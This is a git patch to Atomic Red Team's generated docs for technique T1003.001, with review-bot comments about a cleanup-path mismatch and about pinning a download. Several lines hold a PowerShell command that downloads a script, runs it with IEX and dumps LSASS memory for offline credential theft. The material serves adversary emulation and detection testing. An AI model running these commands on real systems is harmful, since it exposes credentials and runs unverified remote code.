From cb29aa596fa50bb0e7552e5a7477fff88b161489 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Wed, 31 May 2023 21:08:41 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 4 +++- atomics/Indexes/windows-index.yaml | 4 +++- atomics/T1003.001/T1003.001.md | 4 +++- 3 files changed, 9 insertions(+), 3 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index fcd2b8c1..45068180 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -89123,12 +89123,14 @@ credential-access: The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + + Author of Out-Minidump: Matthew Graeber (@mattifestation) supported_platforms: - windows executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump + IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore ' diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index 09f6f50c..9d004675 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml 
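Review bot: The cleanup_command at the end of this hunk removes `$env:TEMP\lsass_*.dmp`, but the description at the top of the same hunk says the dump is created at `$env:SYSTEMROOT\System32\lsass_*.dmp`, so one of the two paths is wrong and the LSASS dump (which holds live credential material) may be left on disk after cleanup. If Out-Minidump still defaults its output to the current directory, the simplest fix is to make the location explicit in the executor, `get-process lsass | Out-Minidump -DumpFilePath $env:TEMP`, and change the description to name `$env:TEMP\lsass_*.dmp` so the documented path, the real path and the cleanup path agree. The commit title says these index files are generated, so the correction belongs in the atomic's source YAML for T1003.001, which is not part of this diff.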
@@ -77382,12 +77382,14 @@ credential-access: The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + + Author of Out-Minidump: Matthew Graeber (@mattifestation) supported_platforms: - windows executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump + IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore ' diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index 065f71b8..209fdcc7 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -420,6 +420,8 @@ The memory of lsass.exe is often dumped for offline credential theft attacks. Th powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. +Author of Out-Minidump: Matthew Graeber (@mattifestation) + **Supported Platforms:** Windows 
@@ -435,7 +437,7 @@ Upon successful execution, you should see the following file created $env:SYSTEM ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump +IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump ``` #### Cleanup Commands:
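Review bot: The new command still downloads a script from a mutable `master` branch and pipes it straight into `IEX`, so moving the URL from PowerSploit to this repository changes who can alter the code that runs as admin on the test host, but not the fact that it is unpinned and unverified; enforcing TLS 1.2 on the line above protects the transport, not the content. Pinning the URL to a commit SHA and checking a SHA-256 of the downloaded text before executing it would make the test reproducible and would fail closed if the file is ever changed upstream, with the expected hash and commit taken from the repository at the time the atomic is updated. The commit title says this markdown is generated, so the change should be made in the atomic's source YAML rather than here.
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# Pin to an immutable ref and verify the script before it is executed
$src = (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/<commit-sha>/atomics/T1003.001/src/Out-Minidump.ps1')
$hash = [BitConverter]::ToString([Security.Cryptography.SHA256]::Create().ComputeHash([Text.Encoding]::UTF8.GetBytes($src))) -replace '-', ''
if ($hash -ne '<expected-sha256>') { throw "Out-Minidump.ps1 hash mismatch: $hash" }
IEX $src; get-process lsass | Out-Minidump
```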